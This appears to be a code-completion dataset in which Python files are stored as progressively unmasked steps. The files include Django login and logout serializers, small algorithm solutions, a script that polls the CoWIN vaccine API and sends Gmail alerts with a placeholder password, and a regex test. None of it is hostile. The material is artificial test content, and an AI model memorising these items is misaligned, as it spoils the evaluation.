fields = 'token',\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-2": "<mask token>\n\n\nclass LogoutSerializer(ModelSerializer):\n <mask token>\n <mask token>\n\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n\n def validate(self, data):\n \"\"\"\n Validate that the requesting user owns the given device.\n \"\"\"\n request = self.context['request']\n data.setdefault('user', request.user)\n data.setdefault('device_user_token', None)\n if not request.user.is_authenticated():\n raise serializers.ValidationError('user is not logged in.')\n try:\n self.instance = DeviceUser.objects.get(**data)\n except DeviceUser.DoesNotExist:\n raise serializers.ValidationError('invalid device')\n return data\n\n def update(self):\n \"\"\"\n Mark the given device as inactive.\n \"\"\"\n self.instance.is_active = False\n self.instance.save()\n return self.instance\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = UserSettings\n fields = ('id', 'session_confirm', 'message',\n 'session_cancellation', 'location_change', 'session_reminder',\n 'available', 'push_notifications_enabled')\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n\n class Meta:\n model = User\n fields = ('id', 'username', 'name', 'last_name', 'second_last_name',\n 'description', 'photo', 'email', 'phone', 'zip_code',\n 'birthday', 'gender', 'is_student', 'is_teacher', 'token',\n 'settings')\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n token = serializers.SerializerMethodField()\n\n\n class Meta:\n model = User\n fields = 'token',\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-3": "<mask token>\n\n\nclass LoginSerializer(serializers.Serializer):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def validate(self, data):\n \"\"\"\n Validation email.\n \"\"\"\n try:\n user = User.objects.get(email__iexact=data.get('email'))\n except User.DoesNotExist:\n raise serializers.ValidationError('invalid credentials')\n if not user.check_password(data.get('password')):\n raise serializers.ValidationError('invalid credentials')\n return data\n <mask token>\n\n\nclass LogoutSerializer(ModelSerializer):\n \"\"\"\n Serializer for log users out.\n \"\"\"\n is_active = serializers.ReadOnlyField()\n\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n\n def validate(self, data):\n \"\"\"\n Validate that the requesting user owns the given device.\n \"\"\"\n request = self.context['request']\n data.setdefault('user', request.user)\n data.setdefault('device_user_token', None)\n if not request.user.is_authenticated():\n raise serializers.ValidationError('user is not logged in.')\n try:\n self.instance = DeviceUser.objects.get(**data)\n except DeviceUser.DoesNotExist:\n raise serializers.ValidationError('invalid device')\n return data\n\n def update(self):\n \"\"\"\n Mark the given device as inactive.\n \"\"\"\n self.instance.is_active = False\n self.instance.save()\n return self.instance\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = UserSettings\n fields = ('id', 'session_confirm', 'message',\n 'session_cancellation', 'location_change', 'session_reminder',\n 'available', 'push_notifications_enabled')\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n\n class Meta:\n model = User\n fields = ('id', 'username', 'name', 'last_name', 'second_last_name',\n 'description', 'photo', 'email', 'phone', 'zip_code',\n 'birthday', 'gender', 'is_student', 'is_teacher', 'token',\n 'settings')\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n token = serializers.SerializerMethodField()\n\n\n class Meta:\n model = User\n fields = 'token',\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-4": "<mask token>\n\n\nclass LoginSerializer(serializers.Serializer):\n email = serializers.EmailField(required=True)\n password = serializers.CharField(required=True)\n device_user_token = serializers.CharField(max_length=250, allow_blank=\n True, required=False)\n device_os = serializers.CharField(max_length=30, allow_blank=False)\n\n def validate(self, data):\n \"\"\"\n Validation email.\n \"\"\"\n try:\n user = User.objects.get(email__iexact=data.get('email'))\n except User.DoesNotExist:\n raise serializers.ValidationError('invalid credentials')\n if not user.check_password(data.get('password')):\n raise serializers.ValidationError('invalid credentials')\n return data\n\n def create(self, validated_data):\n user = get_object_or_404(User, email=validated_data.get('email'))\n device_user_token = validated_data.get('device_user_token')\n device_os = validated_data.get('device_os')\n if isinstance(device_user_token, unicode) and len(device_user_token\n ) == 64 and (not device_os or device_os == ''):\n device_os = 'iOS'\n device, created = DeviceUser.objects.get_or_create(user=user,\n device_user_token=device_user_token)\n device.device_os = device_os\n device.is_active = True\n device.save()\n return user\n\n\nclass LogoutSerializer(ModelSerializer):\n \"\"\"\n Serializer for log users out.\n \"\"\"\n is_active = serializers.ReadOnlyField()\n\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n\n def validate(self, data):\n \"\"\"\n Validate that the requesting user owns the given device.\n \"\"\"\n request = self.context['request']\n data.setdefault('user', request.user)\n data.setdefault('device_user_token', None)\n if not request.user.is_authenticated():\n raise serializers.ValidationError('user is not logged in.')\n try:\n self.instance = DeviceUser.objects.get(**data)\n except DeviceUser.DoesNotExist:\n raise serializers.ValidationError('invalid device')\n return data\n\n def update(self):\n \"\"\"\n Mark the given device as inactive.\n \"\"\"\n self.instance.is_active = False\n self.instance.save()\n return self.instance\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = UserSettings\n fields = ('id', 'session_confirm', 'message',\n 'session_cancellation', 'location_change', 'session_reminder',\n 'available', 'push_notifications_enabled')\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n\n class Meta:\n model = User\n fields = ('id', 'username', 'name', 'last_name', 'second_last_name',\n 'description', 'photo', 'email', 'phone', 'zip_code',\n 'birthday', 'gender', 'is_student', 'is_teacher', 'token',\n 'settings')\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n token = serializers.SerializerMethodField()\n\n\n class Meta:\n model = User\n fields = 'token',\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework import serializers\n\nfrom tandlr.core.api.serializers import ModelSerializer\nfrom tandlr.users.models import DeviceUser, User, UserSettings\nfrom tandlr.utils.refresh_token import create_token\n\n\nclass LoginSerializer(serializers.Serializer):\n email = serializers.EmailField(\n required=True\n )\n\n password = serializers.CharField(\n required=True\n )\n\n device_user_token = serializers.CharField(\n max_length=250,\n allow_blank=True,\n required=False\n )\n\n device_os = serializers.CharField(\n max_length=30,\n allow_blank=False\n )\n\n def validate(self, data):\n \"\"\"\n Validation email.\n \"\"\"\n try:\n user = User.objects.get(email__iexact=data.get('email'))\n except User.DoesNotExist:\n raise serializers.ValidationError(\"invalid credentials\")\n\n if not user.check_password(data.get('password')):\n raise serializers.ValidationError(\"invalid credentials\")\n\n return data\n\n def create(self, validated_data):\n # Valitation mail\n user = get_object_or_404(User, email=validated_data.get('email'))\n\n device_user_token = validated_data.get('device_user_token')\n device_os = validated_data.get('device_os')\n\n if (isinstance(device_user_token, unicode) and\n len(device_user_token) == 64 and\n (not device_os or device_os == '')):\n device_os = 'iOS'\n\n # Save data of the device\n device, created = DeviceUser.objects.get_or_create(\n user=user,\n device_user_token=device_user_token\n )\n\n device.device_os = device_os\n device.is_active = True\n device.save()\n\n return user\n\n\nclass LogoutSerializer(ModelSerializer):\n \"\"\"\n Serializer for log users out.\n \"\"\"\n is_active = serializers.ReadOnlyField()\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n\n def validate(self, data):\n \"\"\"\n Validate that the requesting user owns the given device.\n \"\"\"\n request = self.context['request']\n data.setdefault('user', request.user)\n data.setdefault('device_user_token', None)\n\n if not request.user.is_authenticated():\n raise serializers.ValidationError('user is not logged in.')\n\n try:\n self.instance = DeviceUser.objects.get(**data)\n\n except DeviceUser.DoesNotExist:\n raise serializers.ValidationError('invalid device')\n\n return data\n\n def update(self):\n \"\"\"\n Mark the given device as inactive.\n \"\"\"\n self.instance.is_active = False\n self.instance.save()\n\n return self.instance\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = UserSettings\n fields = (\n 'id',\n 'session_confirm',\n 'message',\n 'session_cancellation',\n 'location_change',\n 'session_reminder',\n 'available',\n 'push_notifications_enabled'\n )\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n class Meta:\n model = User\n fields = (\n 'id', 'username', 'name', 'last_name',\n 'second_last_name', 'description', 'photo', 'email',\n 'phone', 'zip_code', 'birthday', 'gender', 'is_student',\n 'is_teacher', 'token', 'settings'\n )\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n\n token = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = ('token', )\n\n def 
get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-ids": [
9,
11,
15,
17,
19
]
}
|
[
9,
11,
15,
17,
19
] |
"""Given an integer array arr and an integer difference, return the length of
the longest subsequence in arr which is an arithmetic sequence such that the
difference between adjacent elements in the subsequence equals difference."""
class Solution(object):
def longestSubsequence(self, arr, difference):
dp = dict()
mx = 0
for num in arr:
if num - difference in dp:
dp[num] = 1 + dp[num-difference]
else:
dp[num] = 1
mx = max(dp[num],mx)
return mx
|
normal
|
{
"blob_id": "fa4ab3ed5c653633879b5ba2c078c896aa3eb0c6",
"index": 2838,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution(object):\n\n def longestSubsequence(self, arr, difference):\n dp = dict()\n mx = 0\n for num in arr:\n if num - difference in dp:\n dp[num] = 1 + dp[num - difference]\n else:\n dp[num] = 1\n mx = max(dp[num], mx)\n return mx\n",
"step-4": "\"\"\"Given an integer array arr and an integer difference, return the length of \nthe longest subsequence in arr which is an arithmetic sequence such that the \ndifference between adjacent elements in the subsequence equals difference.\"\"\"\n\n\nclass Solution(object):\n def longestSubsequence(self, arr, difference):\n dp = dict()\n mx = 0\n for num in arr:\n if num - difference in dp:\n dp[num] = 1 + dp[num-difference]\n else:\n dp[num] = 1\n mx = max(dp[num],mx)\n return mx\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
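A quick way to sanity-check the dynamic-programming solution in the record above is to run it on a few hand-traced inputs; the snippet below is an illustrative usage sketch, not part of the original blob.

# Illustrative checks for the longestSubsequence DP above (hand-traced expected values).
solver = Solution()
assert solver.longestSubsequence([1, 2, 3, 4], 1) == 4                   # the whole array qualifies
assert solver.longestSubsequence([1, 3, 5, 7], 1) == 1                   # no two adjacent picks can differ by 1
assert solver.longestSubsequence([1, 5, 7, 8, 5, 3, 4, 2, 1], -2) == 4   # subsequence 7, 5, 3, 1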
#alds13c
from collections import deque
d_stack=deque()
res_stack=deque()
s = input()
for i in range(len(s)):
#print(d_stack,res_stack)
if s[i]=="\\":
d_stack.append(i)
elif s[i]=="/":
if len(d_stack)==0:
continue
left = d_stack.pop()
area = i-left
#res_stack.append((left,area))
if len(res_stack)>0:
flag=True
#merge_candidate = []
mergeareasum=0
while flag:
if len(res_stack)>0 and left<res_stack[-1][0]:
mc = res_stack.pop()
mergeareasum += mc[1]
#res_stack.append((left,under[1]+area))
else:
flag = False
res_stack.append((left,area+mergeareasum))
else:
res_stack.append((left,area))
ans=0
v_devided=[]
for pair in res_stack:
ans += pair[1]
v_devided.append(str(pair[1]))
print(ans)
if len(v_devided)>0:
print(len(v_devided)," ".join(v_devided))
else:
print(0)
|
normal
|
{
"blob_id": "48e3259698788904e000eb15b5443067b0c3e791",
"index": 5968,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\n<mask token>\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-3": "<mask token>\nd_stack = deque()\nres_stack = deque()\ns = input()\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\nans = 0\nv_devided = []\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-4": "from collections import deque\nd_stack = deque()\nres_stack = deque()\ns = input()\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\nans = 0\nv_devided = []\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-5": "#alds13c\nfrom collections import deque\n\nd_stack=deque()\nres_stack=deque()\ns = input()\n\nfor i in range(len(s)):\n #print(d_stack,res_stack)\n if s[i]==\"\\\\\":\n d_stack.append(i)\n elif s[i]==\"/\":\n if len(d_stack)==0:\n continue\n left = d_stack.pop()\n area = i-left\n #res_stack.append((left,area))\n if len(res_stack)>0:\n flag=True\n #merge_candidate = []\n mergeareasum=0\n while flag:\n if len(res_stack)>0 and left<res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n #res_stack.append((left,under[1]+area))\n else:\n flag = False\n res_stack.append((left,area+mergeareasum))\n else:\n res_stack.append((left,area))\n\nans=0\nv_devided=[]\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided)>0:\n print(len(v_devided),\" \".join(v_devided))\nelse:\n print(0)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
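The record above is the standard stack-based scan for flooded cross-section areas: each '\' opens a slope, a matching '/' closes a pool, and pools nested inside a larger pool are merged into it. The sketch below restates the same idea as a self-contained function with one hand-traced check; it is illustrative only and not part of the original blob.

def flooded_areas(diagram):
    # Same two-stack idea as the record above, wrapped as a reusable function.
    downs = []   # indices of '\' not yet matched by a '/'
    pools = []   # (left_index, area) pairs for completed pools
    for i, ch in enumerate(diagram):
        if ch == '\\':
            downs.append(i)
        elif ch == '/' and downs:
            left = downs.pop()
            area = i - left
            merged = 0
            while pools and pools[-1][0] > left:
                merged += pools.pop()[1]   # absorb pools nested inside this one
            pools.append((left, area + merged))
    return [area for _, area in pools]

assert flooded_areas('\\\\//') == [4]   # input of two '\' then two '/': a single pool of area 4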
import smtplib
import requests
import datetime
import json
import time
from datetime import date
from urllib.request import Request,urlopen
today = date.today().strftime("%d-%m-%y")
count = 0
pincodes = ["784164","781017","784161","787001"]
date = 0
temp = str(14) + "-05-21"
while True:
for i in range(0,8):
temp = str(23+i) + "-05-21"
for pincode in pincodes:
req = Request(
"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode=" + pincode + "&date=" + temp,
headers={'User-Agent': 'Mozilla/5.0'})
webpage = urlopen(req).read()
data = json.loads(webpage)
for center in data["centers"]:
for session in center["sessions"]:
print("\t", center["name"])
print("\t", center["address"])
print("\t Price: ", center["fee_type"])
print("\t", session["vaccine"])
print("\t Age limit:", session["min_age_limit"])
print("\t Available Capacity: ", session["available_capacity"])
print("////////////////////////////////////////////////////")
if int(session["available_capacity"]) > 0:
server = smtplib.SMTP_SSL("smtp.gmail.com", 465)
server.login("[email protected]", "password")
if pincode == "784164":
server.sendmail("[email protected]", "[email protected]",
"Vaccine available , Kindly check your cowin app")
elif pincode == "781017":
server.sendmail("[email protected]", "[email protected]",
"Vaccine available , Kindly check your cowin app")
server.sendmail("[email protected]", "[email protected]",
"Vaccine available , Kindly check your cowin app")
else:
server.sendmail("[email protected]", "[email protected]",
"Vaccine available , Kindly check your cowin app")
server.quit()
time.sleep(20)
|
normal
|
{
"blob_id": "7c60ae58b26ae63ba7c78a28b72192373cc05a86",
"index": 1211,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n for i in range(0, 8):\n temp = str(23 + i) + '-05-21'\n for pincode in pincodes:\n req = Request(\n 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode='\n + pincode + '&date=' + temp, headers={'User-Agent':\n 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n data = json.loads(webpage)\n for center in data['centers']:\n for session in center['sessions']:\n print('\\t', center['name'])\n print('\\t', center['address'])\n print('\\t Price: ', center['fee_type'])\n print('\\t', session['vaccine'])\n print('\\t Age limit:', session['min_age_limit'])\n print('\\t Available Capacity: ', session[\n 'available_capacity'])\n print(\n '////////////////////////////////////////////////////')\n if int(session['available_capacity']) > 0:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login('[email protected]',\n 'password')\n if pincode == '784164':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n elif pincode == '781017':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n else:\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.quit()\n time.sleep(20)\n",
"step-3": "<mask token>\ntoday = date.today().strftime('%d-%m-%y')\ncount = 0\npincodes = ['784164', '781017', '784161', '787001']\ndate = 0\ntemp = str(14) + '-05-21'\nwhile True:\n for i in range(0, 8):\n temp = str(23 + i) + '-05-21'\n for pincode in pincodes:\n req = Request(\n 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode='\n + pincode + '&date=' + temp, headers={'User-Agent':\n 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n data = json.loads(webpage)\n for center in data['centers']:\n for session in center['sessions']:\n print('\\t', center['name'])\n print('\\t', center['address'])\n print('\\t Price: ', center['fee_type'])\n print('\\t', session['vaccine'])\n print('\\t Age limit:', session['min_age_limit'])\n print('\\t Available Capacity: ', session[\n 'available_capacity'])\n print(\n '////////////////////////////////////////////////////')\n if int(session['available_capacity']) > 0:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login('[email protected]',\n 'password')\n if pincode == '784164':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n elif pincode == '781017':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n else:\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.quit()\n time.sleep(20)\n",
"step-4": "import smtplib\nimport requests\nimport datetime\nimport json\nimport time\nfrom datetime import date\nfrom urllib.request import Request, urlopen\ntoday = date.today().strftime('%d-%m-%y')\ncount = 0\npincodes = ['784164', '781017', '784161', '787001']\ndate = 0\ntemp = str(14) + '-05-21'\nwhile True:\n for i in range(0, 8):\n temp = str(23 + i) + '-05-21'\n for pincode in pincodes:\n req = Request(\n 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode='\n + pincode + '&date=' + temp, headers={'User-Agent':\n 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n data = json.loads(webpage)\n for center in data['centers']:\n for session in center['sessions']:\n print('\\t', center['name'])\n print('\\t', center['address'])\n print('\\t Price: ', center['fee_type'])\n print('\\t', session['vaccine'])\n print('\\t Age limit:', session['min_age_limit'])\n print('\\t Available Capacity: ', session[\n 'available_capacity'])\n print(\n '////////////////////////////////////////////////////')\n if int(session['available_capacity']) > 0:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login('[email protected]',\n 'password')\n if pincode == '784164':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n elif pincode == '781017':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n else:\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.quit()\n time.sleep(20)\n",
"step-5": "import smtplib\r\nimport requests\r\nimport datetime\r\nimport json\r\nimport time\r\nfrom datetime import date\r\nfrom urllib.request import Request,urlopen\r\n\r\ntoday = date.today().strftime(\"%d-%m-%y\")\r\ncount = 0\r\n\r\npincodes = [\"784164\",\"781017\",\"784161\",\"787001\"]\r\n\r\ndate = 0\r\ntemp = str(14) + \"-05-21\"\r\n\r\n\r\nwhile True:\r\n\r\n for i in range(0,8):\r\n temp = str(23+i) + \"-05-21\"\r\n for pincode in pincodes:\r\n req = Request(\r\n \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode=\" + pincode + \"&date=\" + temp,\r\n headers={'User-Agent': 'Mozilla/5.0'})\r\n webpage = urlopen(req).read()\r\n data = json.loads(webpage)\r\n for center in data[\"centers\"]:\r\n for session in center[\"sessions\"]:\r\n print(\"\\t\", center[\"name\"])\r\n print(\"\\t\", center[\"address\"])\r\n print(\"\\t Price: \", center[\"fee_type\"])\r\n print(\"\\t\", session[\"vaccine\"])\r\n print(\"\\t Age limit:\", session[\"min_age_limit\"])\r\n print(\"\\t Available Capacity: \", session[\"available_capacity\"])\r\n print(\"////////////////////////////////////////////////////\")\r\n if int(session[\"available_capacity\"]) > 0:\r\n server = smtplib.SMTP_SSL(\"smtp.gmail.com\", 465)\r\n server.login(\"[email protected]\", \"password\")\r\n if pincode == \"784164\":\r\n server.sendmail(\"[email protected]\", \"[email protected]\",\r\n \"Vaccine available , Kindly check your cowin app\")\r\n elif pincode == \"781017\":\r\n server.sendmail(\"[email protected]\", \"[email protected]\",\r\n \"Vaccine available , Kindly check your cowin app\")\r\n server.sendmail(\"[email protected]\", \"[email protected]\",\r\n \"Vaccine available , Kindly check your cowin app\")\r\n else:\r\n server.sendmail(\"[email protected]\", \"[email protected]\",\r\n \"Vaccine available , Kindly check your cowin app\")\r\n server.quit()\r\n time.sleep(20)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import datetime
def year_choices():
return [(r, r) for r in range(1984, datetime.date.today().year + 1)]
def current_year():
return datetime.date.today().year
|
normal
|
{
"blob_id": "90bb70b0a97c7872c8581a176ebacc50df8e1f72",
"index": 464,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef year_choices():\n return [(r, r) for r in range(1984, datetime.date.today().year + 1)]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef year_choices():\n return [(r, r) for r in range(1984, datetime.date.today().year + 1)]\n\n\ndef current_year():\n return datetime.date.today().year\n",
"step-4": "import datetime\n\n\ndef year_choices():\n return [(r, r) for r in range(1984, datetime.date.today().year + 1)]\n\n\ndef current_year():\n return datetime.date.today().year\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
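The two helpers above are the usual pattern for keeping a year field's choices and default current in Django; the model below is a hypothetical usage sketch (the Album model and field name are assumptions, not from the original record).

# Hypothetical Django model using the helpers above (assumes Django is installed).
from django.db import models

class Album(models.Model):
    # choices are built once when the model class loads; the callable default stays current.
    year = models.IntegerField(choices=year_choices(), default=current_year)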
import warnings
from re import *
from pattern import collection
warnings.filterwarnings("ignore")
def test():
raw_text = "通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»"
pattern = collection.pattern_test("js_var")
print(f"匹配模式为:{pattern}")
print("----------------------------------------------")
#return_text = findall(pattern, raw_text)
pattern = compile(pattern)
return_text = sub(pattern, "替换成功", raw_text)
print(return_text)
''' if(return_text):
for i, each in enumerate(return_text):
print(f"第{i+1}个匹配结果:{each}")
else:
print("Not Found pattern-like string!") '''
if __name__ == "__main__":
test()
|
normal
|
{
"blob_id": "488d20a86c5bddbca2db09b26fb8df4b6f87a1dc",
"index": 2354,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test():\n raw_text = (\n \"通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»\"\n )\n pattern = collection.pattern_test('js_var')\n print(f'匹配模式为:{pattern}')\n print('----------------------------------------------')\n pattern = compile(pattern)\n return_text = sub(pattern, '替换成功', raw_text)\n print(return_text)\n \"\"\" if(return_text):\n for i, each in enumerate(return_text):\n print(f\"第{i+1}个匹配结果:{each}\")\n else:\n print(\"Not Found pattern-like string!\") \"\"\"\n\n\n<mask token>\n",
"step-3": "<mask token>\nwarnings.filterwarnings('ignore')\n\n\ndef test():\n raw_text = (\n \"通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»\"\n )\n pattern = collection.pattern_test('js_var')\n print(f'匹配模式为:{pattern}')\n print('----------------------------------------------')\n pattern = compile(pattern)\n return_text = sub(pattern, '替换成功', raw_text)\n print(return_text)\n \"\"\" if(return_text):\n for i, each in enumerate(return_text):\n print(f\"第{i+1}个匹配结果:{each}\")\n else:\n print(\"Not Found pattern-like string!\") \"\"\"\n\n\nif __name__ == '__main__':\n test()\n",
"step-4": "import warnings\nfrom re import *\nfrom pattern import collection\nwarnings.filterwarnings('ignore')\n\n\ndef test():\n raw_text = (\n \"通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»\"\n )\n pattern = collection.pattern_test('js_var')\n print(f'匹配模式为:{pattern}')\n print('----------------------------------------------')\n pattern = compile(pattern)\n return_text = sub(pattern, '替换成功', raw_text)\n print(return_text)\n \"\"\" if(return_text):\n for i, each in enumerate(return_text):\n print(f\"第{i+1}个匹配结果:{each}\")\n else:\n print(\"Not Found pattern-like string!\") \"\"\"\n\n\nif __name__ == '__main__':\n test()\n",
